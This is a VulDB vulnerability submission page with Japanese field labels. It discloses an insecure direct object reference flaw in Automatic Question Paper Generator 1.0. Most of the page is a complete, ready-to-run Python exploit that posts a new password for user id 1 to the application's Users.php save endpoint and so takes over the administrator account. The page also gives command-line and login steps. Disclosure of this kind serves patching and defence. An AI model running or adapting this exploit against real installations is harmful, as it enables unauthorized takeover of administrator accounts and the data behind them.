| タイトル | Automatic Question Paper Generator System 1.0 - Authentication Bypass |
|---|
| 説明 | The Automatic Question Paper Generator (AQPG) in version 1.0 is vulnerable to bypassing authentication by changing the administrator password by insecure direct object reference (IDOR) attack, for this reason, the attacker can have full access to the administrator account by resetting your password.
* Steps to Reproduce:
1. Create a python file and paste this code and save:
#######################################################
import requests
import random
import string
from requests_toolbelt import MultipartEncoder
from time import sleep
import argparse
def banner():
print('''
___ ____ ____ ______
/ | / __ \ / __ \/ ____/
/ /| |/ / / / / /_/ / / __
/ ___ / /_/ / / ____/ /_/ /
/_/ |_\___\_\/_/ \____/
[Automatic Question Paper Generator v1.0]
[Authentication Bypass]
''')
def main():
fields = {
'id': "1",
'firstname': 'Adminstrator',
'lastname': 'Admin',
'username': 'admin',
'password': arguments.newpassword
}
boundary = '----WebKitFormBoundary' + ''.join(random.sample(string.ascii_letters + string.digits, 16))
m = MultipartEncoder(fields=fields, boundary=boundary)
headers = {
"Connection": "keep-alive",
"Content-Type": m.content_type
}
r = requests.post(f'{arguments.url}/classes/Users.php?f=save', headers=headers, data=m)
if '1' in r.text:
print(f'[+] Account taken successfully! Login: admin:{arguments.newpassword}')
else:
print('[-] Not vulnerable')
if __name__ == '__main__':
parser = argparse.ArgumentParser()
parser.add_argument('-u','--url', action='store', help='Target URL (http://target.com/aqpg/)', dest='url', required=True)
parser.add_argument('-p','--password', action='store', help='New password', dest='newpassword', required=True)
arguments = parser.parse_args()
banner()
sleep(2)
main()
#######################################################
2. Run the command:
python3 exploit.py -u http://target.com/aqpg/ -p newpassword
3. Now open your browser and go to the admin login page (http://target.com/aqpg/admin/login.php) and login using the admin:newpassword credentials.
You will be logged into the administrator account. |
|---|
| ソース | ⚠️ https://www.sourcecodester.com/php/15190/automatic-question-paper-generator-system-phpoop-free-source-code.html |
|---|
| ユーザー | mrempy (UID 24379) |
|---|
| 送信 | 2022年03月05日 18:13 (4 年 ago) |
|---|
| モデレーション | 2022年03月13日 12:12 (8 days later) |
|---|
| ステータス | 承諾済み |
|---|
| VulDBエントリ | 194839 [Automatic Question Paper Generator 1.0 特権昇格] |
|---|
| ポイント | 20 |
|---|